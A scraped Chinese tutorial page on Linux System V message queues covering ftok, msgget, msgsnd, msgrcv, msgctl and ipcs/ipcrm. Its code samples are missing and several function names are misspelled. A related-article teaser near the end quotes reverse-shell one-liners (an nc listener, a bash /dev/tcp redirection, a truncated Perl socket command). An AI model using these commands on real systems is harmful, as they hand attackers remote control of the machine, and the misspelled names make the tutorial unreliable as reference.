位置: 编程技术 - 正文

Linux消息队列实现进程间通信实例详解(linux 消息队列 系统参数)

编辑:rootadmin

推荐整理分享Linux消息队列实现进程间通信实例详解(linux 消息队列 系统参数),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:linux消息队列阻塞,linux消息队列实例,linux设置消息队列大小,linux消息队列底层原理,linux消息队列实现,linux消息队列实现,linux消息队列实现,linux消息队列实例,内容如对您有帮助,希望把文章链接给更多的朋友!

Linux消息队列实现进程间通信实例详解

一、什么是消息队列

消息队列提供了一种从一个进程向另一个进程发送一个数据块的方法。 每个数据块都被认为含有一个类型,接收进程可以独立地接收含有不同类型的数据结构。我们可以通过发送消息来避免命名管道的同步和阻塞问题。但是消息队列与命名管道一样,每个数据块都有一个最大长度的限制。

Linux用宏MSGMAX和MSGMNB来限制一条消息的最大长度和一个队列的最大长度。

二、在Linux中使用消息队列

Linux提供了一系列消息队列的函数接口来让我们方便地使用它来实现进程间的通信。它的用法与其他两个System V PIC机制,即信号量和共享内存相似。

进程间通信(IPC):进程间通信的本质就是通过让不同的进程看到一份公共的资源来实现通信。

常用的进程间通信的方式有两种:通过管道和systemv标准,今天我们来介绍systemv标准中的一种:消息队列

消息队列:消息队列提供了一种从一个进程向另一个进程发送一个数据块的方法,每个数据块都认为是有一个类型,接受者进程接收的数据块可以有不同的类型值。我们可以通过发送消息来避免命名管道的同步和阻塞问题。

特点:

(1)消息队列可认为是全局的一个链表,由消息队列标识符进行标识。 (2)消息队列允许一个或多个进程写入或读取消息 (3)消息队列的声明周期随内核 (4)消息队列可以实现双向通信

创建一个消息队列:msget() 第一个参数:每一个消息队列都有唯一的key值,可以由ftok()产生

第二个参数:一般由两个选项IPC_CREAT和IPC_EXCL,单独使用ipc_creat时,如果消息队列不存在则创建一个,如果存在则打开 IPC_EXCL 如果同时使用,如果消息队列不存在则创建之,如果存在则出错返回。当单独使用IPC_EXCL时,没有意义。

Linux消息队列实现进程间通信实例详解(linux 消息队列 系统参数)

ftok: 参数可由用户指定。

下面用代码实现消息队列的创建:

在创建一个消息队列(其他ipc相同)时,需要先通过文件路径名和项目ID获取一个键值,然后通过此键值由内核生成标识符,在以后可通过此标识符来使用此消息队列。

为什么要有key值和标识符两个值呢?

描述符是对于用户操作而言的,让用户感觉操作和对文件的操作相同,key是对于系统内部说的。

我们使用ftok来创建key值,具体可以man一下fotk函数,大概是这样的:按给定的路径名取得其stat结构,从该结构中取出部分st_dev和st_ino字段,然后再与项目id组合起来,如果两个路径名引用两个不同的文件,那么,对这两个路径名调用ftok通常返回不同的key值,但是,因为i节点号和key通常都存放在长整型中,于是创建key时可能会丢失信息,这意味着,如果使用同一项目id,那么对于不同文件的两个路径名可能产生相同的key值。而标识符是唯一确定的,可以用来区别于其他ipc的。

删除消息队列:msgctl() 代码实现:

发送消息:msgsnd()

接收消息:magrcv(),这两个函数实现进程间的双向通信

参数:msqid-消息队列标识码

msgp-指向消息缓冲区的指针,此位置是用来暂时存储发送和接收的消息,是一个用户可定义的通用结构。 msgtyp-从消息队列内读取的消息形态。如果值为0,则表示消息队列中,所有消息被读取。 msgsz:消息的大小

返回值:成功返回0,失败则返回-1.

那么如何查看系统中正在运行的消息队列呢?

介绍两个命令:ipcs -q 查看消息队列

ipcrm -q msgid 删除此消息队列

感谢阅读,希望能帮助到大家,谢谢大家对本站的支持!

Linux共享内存实现机制的详解 Linux共享内存实现机制的详解内存共享:两个不同进程A、B共享内存的意思是,同一块物理内存被映射到进程A、B各自的进程地址空间。进程A可以即时看

Linux下NC反弹shell命令(推荐) 本机开启监听:nc-lvnpnc-vvlp目标机器开启反弹bash版本:bash-i&/dev/tcp/.0.0.1/&1perl版本:perl-e'useSocket;$i=".0.0.1";$p=;socket(S,PF_INET,SOCK_STREAM,getprot

Linux中的host命令应用实例详解 Linux中的host命令应用举例一命令语法功能:查出某个主机名的IPhosthostname[server][server]:使用不是由/etc/resolv.conf文件定义的DNS服务器IP来查询某台主机的IP

标签: linux 消息队列 系统参数

本文链接地址:https://www.jiuchutong.com/biancheng/378223.html 转载请保留说明!

上一篇:linux创建PHP定时任务的实例(linux搭建php运行环境)

下一篇:Linux共享内存实现机制的详解(linux共享内存最大值)

  • 税金及附加现金流量表
  • 以前年度出口退税申报
  • 结转固定资产清理的会计科目
  • 小企业遵循什么会计准则
  • 企业所得税的常设机构
  • 支票报销是怎么操作的
  • 短期借款,应付票据,应付账款和应交税费属于
  • 简易征收可以抵扣进项吗
  • 以前年度固定资产入账错误怎么办?
  • 银行本票通俗
  • 发票勾选平台已经勾选统计确认,报税平台看不见
  • 买酒 专票
  • 一般纳税人以清包工方式
  • 专票当月开的能作废吗
  • 合伙人退伙资产清算需要交税吗
  • 一台设备发票开来0.5台怎么做账?
  • 戴尔开启vt教程
  • win10点击添加账户没反应
  • 部门预算编制方法
  • win11如何设置开机自启动软件
  • 内置管理员无法激活此应用
  • php生成文件流
  • php数组函数输出《咏雪》里有多少"片"字
  • 房产产权置换
  • hptlbxfx.exe
  • php addslashes函数
  • Mont Choisy Beach, Mauritius (© Robert Harding World Imagery/Offset by Shutterstock)
  • 未担保余值是谁承担
  • php动态读取数据的代码
  • 零售价是含税价还是不含税价
  • 餐饮专用发票可抵扣吗
  • Sklearn GridSearchCV跑SVM很慢或卡死解决办法,SVM线性核函数卡死
  • win11设置项改中文
  • thinkphp 多表查询
  • 物流小规模企业有哪些
  • 资产处置损益明细表货币资金怎么填
  • 金税盘发票报送失败怎么办
  • 携程 海外
  • access2000是什么
  • 软件企业研发费用
  • 社保稳岗补贴怎么查询
  • 增值税留抵扣额
  • 印花税该是如何征收的
  • 以个人名义汇货要交税吗
  • 公关费用计入什么科目比较好
  • 如何做好应收应付会计
  • 没进项发票开销项发票可以吗?
  • 合伙企业是什么组织形式
  • 管理成本分摊比例是多少
  • 核定征收需要什么资料
  • 什么是经营所得现金
  • 拿支票取钱
  • 分公司需要做税务报道吗
  • 固定资产清理和持有待售资产
  • sql server数据库中的null(空值)
  • mysql函数用法
  • mysql查询id最大的记录
  • 怎么用sql脚本创建数据库
  • 你一定不知道的56个历史真相
  • mac电脑自带软件介绍
  • win7系统怎么调鼠标
  • win7远程设置在哪
  • win101909消费者版是什么意思
  • mmtraylsi.exe是什么进程 有什么作用 mmtraylsi进程查询
  • mbr是什么启动
  • window10提示更新总是
  • linux云端服务器
  • win7桌面图标有小方块
  • opengl立体模型
  • nodejs stdin
  • python线程池最大数量
  • 网站检测系统
  • Unity导出的webgl能做AR吗
  • unity2d序列帧
  • Centos6.8下Node.js安装教程
  • unity 子对象
  • 作为税务人员哪些基本素质
  • 非法印制发票的后果
  • 企业将持有的交易性金融资产售出,实际收到出售价款
  • 中国经济行业排名
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设